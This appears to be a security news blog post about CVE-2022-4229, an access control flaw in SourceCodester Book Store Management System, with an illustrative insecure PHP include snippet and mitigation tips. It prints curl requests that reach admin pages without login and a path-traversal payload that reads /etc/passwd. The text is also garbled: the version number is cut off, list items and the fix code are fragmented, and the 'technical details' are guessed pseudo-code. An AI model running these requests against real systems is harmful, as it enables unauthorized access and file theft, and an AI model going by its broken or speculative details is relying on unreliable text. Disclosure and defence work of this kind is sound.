CVE CyberSecurity Database News

CVE-2022-4229 - Critical Improper Access Control in SourceCodester Book Store Management System 1. — A Deep Dive

Poster -

A critical security flaw, CVE-2022-4229, has been discovered in SourceCodester Book Store Management System 1. (BSMS). This issue, tracked as VDB-214588, allows remote attackers to bypass access controls and potentially gain unauthorized access to privileged parts of the application. In this long-read post, we’ll take an exclusive, simplified look at what happened, what’s at risk, how the exploit works, and how you can protect your systems.

What Is SourceCodester Book Store Management System?

SourceCodester’s Book Store Management System is a popular open-source project. Small businesses and developers use it to digitize and automate book inventory, sales, and staff management. Like many similar PHP-based CRUD (Create, Read, Update, Delete) apps, security is crucial, as they often hold sensitive inventory and customer data.

The Vulnerability: Improper Access Controls

CVE-2022-4229 stems from improper access controls implemented in the application's main entry file, /bsms_ci/index.php. In non-technical terms, this means that the system fails to correctly check if a user is authorized to access or modify certain resources.

Attack vector: Remote (no need for physical or local access)

- Vulnerable file: /bsms_ci/index.php
- Impact: Unauthorized access to privileged functions, potentially full account takeover or sensitive data exposure.

Technical Details

Usually, web apps protect sensitive actions or admin areas by checking user authentication and roles. In BSMS 1., this check is either missing, misconfigured, or can be easily bypassed with direct requests.

Consider a simplified snippet representing an insecure access control check in index.php

// Example pseudo-vulnerable code
if (isset($_GET['page'])) {
    $page = $_GET['page'];
    include $page . ".php";
}

Instead of validating if the $page requested should be available only to authenticated or admin users, the script just includes any file passed via the page URL parameter. This practice, called Insecure Direct Object Reference (IDOR) or LFI (Local File Inclusion) if unchecked, allows attackers to load sensitive files or access restricted features.

Access the application in a browser or via a tool like cURL, without logging in.

2. Send requests with crafted page parameters to probe for administrative functionality, for example:

`

http://your-bsms-app/bsms_ci/index.php?page=admin_dashboard

`


3. If there’s no access authentication or role verification, the server blindly includes and processes the admin_dashboard.php script. Now, the attacker can interact with admin features.

Real-World Exploit Example (cURL)

curl "http://target-site/bsms_ci/index.php?page=admin_dashboard";

If the page loads, you have confirmed improper access control.

Let’s imagine the attacker finds user and sales management features like so

# Access User Management without login
curl "http://target-site/bsms_ci/index.php?page=user_management";

# Access Sales without login
curl "http://target-site/bsms_ci/index.php?page=sales";

# Even try reading files
curl "http://target-site/bsms_ci/index.php?page=../../../../etc/passwd";

Depending on the configuration, this could even lead to File Inclusion vulnerabilities, letting attackers read local files.

References

- Vulnerability Database: VDB-214588  
- NVD: CVE-2022-4229 Record  
- Original Exploit Disclosure – Useful to see how the system is structured.

Site Defacement or Sabotage: Change, delete, or manipulate system data at will.

- Wider Attacks: If File Inclusion is possible, attackers may run arbitrary code or steal system files.


## How To Fix / Mitigate

1. Patch Now: Check the vendor site for an official fix. If unavailable, limit access to the application until fixed.
2. Implement Proper Access Controls: Always check user authentication and authorization before including or executing sensitive files.

die("Unauthorized access!");

}

Conclusion

CVE-2022-4229 is a textbook example of why access control and code hygiene matter in PHP web apps. If you run SourceCodester BSMS or similar apps, review your access control logic and regularly update your software.

For more details or help, check out the official VDB-214588 page and watch for patches or community fixes.

Stay Secure! 🔒

*If you have this system online, please patch immediately and audit your logs for suspicious activity.*

Timeline

Published on: 11/30/2022 12:15:00 UTC
Last modified on: 01/09/2023 17:04:00 UTC